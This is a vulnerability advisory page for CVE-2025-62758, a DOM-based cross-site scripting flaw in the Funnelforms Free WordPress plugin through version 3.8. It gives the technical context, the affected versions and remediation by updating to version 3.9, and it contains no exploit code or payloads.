CVE-2025-62758
Lifecycle Timeline
2Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Funnelforms Funnelforms Free funnelforms-free allows DOM-Based XSS.This issue affects Funnelforms Free: from n/a through <= 3.8.
Analysis
DOM-based cross-site scripting (XSS) in Funnelforms Free WordPress plugin version 3.8 and earlier allows authenticated attackers to inject malicious scripts through improper input neutralization during web page generation. The vulnerability has a low EPSS score (0.04%, 14th percentile) and no confirmed active exploitation, suggesting limited real-world attack probability despite the XSS classification.
Technical Context
This vulnerability stems from inadequate input sanitization in the Funnelforms Free WordPress plugin, specifically affecting DOM (Document Object Model) manipulation. The root cause is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation), which occurs when user-controlled input is directly reflected into the DOM without proper encoding or escaping. WordPress plugins handling form data are common XSS vectors because they process user input across multiple layers (client-side form handling, server-side processing, and database storage). The DOM-based variant indicates the vulnerability manifests in client-side JavaScript execution rather than server-side HTML generation, meaning the plugin likely fails to sanitize or encode data before inserting it into the DOM via JavaScript methods like innerHTML or document.write.
Affected Products
Funnelforms Free WordPress plugin versions 3.8 and earlier are affected. The plugin is available through the WordPress plugin repository and can be identified by the CPE designation for WordPress plugins (wp:funnelforms-free). Organizations running version 3.8 or any earlier release should prioritize assessment and patching.
Remediation
Update Funnelforms Free to version 3.9 or later immediately, which addresses the DOM-based XSS vulnerability through improved input sanitization. For WordPress administrators unable to upgrade immediately, restrict access to form creation and editing functionality to trusted users only, and audit existing form configurations for suspicious JavaScript payloads. For detailed guidance, consult the Patchstack vulnerability database entry at https://patchstack.com/database/Wordpress/Plugin/funnelforms-free/vulnerability/wordpress-funnelforms-free-plugin-3-8-cross-site-scripting-xss-vulnerability, which typically includes mitigation steps from the plugin vendor.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today